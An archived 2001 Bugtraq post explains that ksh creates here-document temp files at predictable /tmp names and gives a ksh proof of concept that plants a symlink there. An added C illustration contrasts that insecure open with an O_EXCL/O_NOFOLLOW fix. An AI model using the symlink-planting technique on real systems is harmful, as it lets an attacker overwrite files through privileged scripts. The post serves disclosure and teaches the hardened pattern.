Bugtraq mailing list archives

Re: Solaris Patchadd symlink exploit.


From: psz () maths usyd edu au (Paul Szabo)
Date: Tue, 28 Aug 2001 07:06:08 +1000 (EST)

Here is an exploit for an old bug in patchadd on Solaris. ...
#See BID http://www.securityfocus.com/bid/2127

The bug is not in the patchadd script, but in the Korn shell ksh that
creates "here documents" insecurely.

Demonstration (ksh is vulnerable if the size of silly.1 is changed):

#!/bin/ksh -x
# Victim file, initially empty: its size before and after is the tell-tale.
touch /tmp/silly.1
# Plant a symlink at the name this ksh will use for its here-document temp
# file ($$ is the shell's own PID, so the name is predictable).
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
# If silly.1 has grown, ksh wrote the here-document through the symlink.
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*

Note that there is a similar bug in the Bourne shell sh. For a historical
perspective see articles:

http://www.securityfocus.com/templates/archive.pike?list=1&msg=200011230225.NAA19716 () milan maths usyd edu au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012190800.TAA05385 () milan maths usyd edu au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202213.JAA03182 () milan maths usyd edu au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202211.JAA25620 () milan maths usyd edu au

Cheers,

Paul Szabo - psz () maths usyd edu au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia
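The root cause the post points at is a temp-file pattern rather than anything in patchadd: a predictable name under /tmp, opened with O_CREAT but without O_EXCL, so a symlink pre-planted at that name is silently followed. The C program below is an added illustration of that pattern next to its hardened form; it is not ksh's source and not code from the original post. The name scheme `sh<pid>.<n>`, the function names, and the sample here-document body are assumptions chosen to mirror the post's demo, and the whole scenario runs inside a private mkdtemp directory so it never touches the real /tmp.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical stand-in for an old shell's here-document temp-file name:
 * "<dir>/sh<pid>.<n>", the same shape as /tmp/sh$$.1 in the post's demo.
 * Illustrates the pattern only; this is not ksh's code. */
static void heredoc_name(char *buf, size_t len, const char *dir, int n) {
    snprintf(buf, len, "%s/sh%ld.%d", dir, (long)getpid(), n);
}

/* Insecure pattern: predictable name, O_CREAT without O_EXCL, symlinks
 * followed. A pre-planted symlink means the here-document body lands in
 * whatever file the link points at. Returns bytes written, or -1. */
static ssize_t heredoc_insecure(const char *path, const char *body) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return -1;
    ssize_t w = write(fd, body, strlen(body));
    close(fd);
    return w;
}

/* Hardened pattern: O_EXCL refuses an already-existing name and O_NOFOLLOW
 * refuses to traverse a symlink, so a planted link makes the open fail
 * (errno EEXIST or ELOOP) instead of clobbering the target. */
static ssize_t heredoc_hardened(const char *path, const char *body) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    ssize_t w = write(fd, body, strlen(body));
    close(fd);
    return w;
}

/* The attacker's move from the post: a symlink at the predictable name
 * pointing at the victim file. Returns 0 on success. */
static int plant_symlink(const char *victim, const char *predicted) {
    unlink(predicted);
    return symlink(victim, predicted);
}

static long file_size(const char *path) {
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

/* Results of the last run_scenario() call. */
static long g_victim_size = -1;   /* victim size after the insecure open */
static int  g_hardened_errno = 0; /* errno from the refused hardened open */

/* Runs both opens against a planted symlink in a scratch directory.
 * Returns 1 when the insecure open clobbered the victim and the hardened
 * open refused, 0 otherwise. */
static int run_scenario(void) {
    char dir[] = "/tmp/heredocXXXXXX";
    if (mkdtemp(dir) == NULL) {
        strcpy(dir, "./heredocXXXXXX");      /* fallback if /tmp is unusable */
        if (mkdtemp(dir) == NULL) return 0;
    }
    char victim[256], predicted[256];
    snprintf(victim, sizeof victim, "%s/silly.1", dir);
    heredoc_name(predicted, sizeof predicted, dir, 1);

    /* Victim starts empty, like "touch /tmp/silly.1" in the post. */
    int fd = open(victim, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return 0;
    close(fd);

    const char *body = "Just some short text\n";  /* constructed sample body */
    int ok = 1;

    if (plant_symlink(victim, predicted) != 0) ok = 0;
    if (heredoc_insecure(predicted, body) < 0) ok = 0;
    g_victim_size = file_size(victim);
    if (g_victim_size != (long)strlen(body)) ok = 0;   /* 21 bytes: clobbered */

    if (plant_symlink(victim, predicted) != 0) ok = 0;
    errno = 0;
    if (heredoc_hardened(predicted, body) >= 0) ok = 0; /* must be refused */
    g_hardened_errno = errno;
    if (g_hardened_errno != EEXIST && g_hardened_errno != ELOOP) ok = 0;

    unlink(predicted); unlink(victim); rmdir(dir);
    return ok;
}

int main(void) {
    int ok = run_scenario();
    printf("insecure open: victim is now %ld bytes (symlink followed)\n", g_victim_size);
    printf("hardened open: refused with %s\n", strerror(g_hardened_errno));
    return ok ? 0 : 1;
}
```

The same fix applies to any program that writes scratch data under a shared directory: use mkstemp()/mkdtemp(), or open with O_CREAT|O_EXCL (plus O_NOFOLLOW where available), and treat a failure as an attack rather than retrying on the same name.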
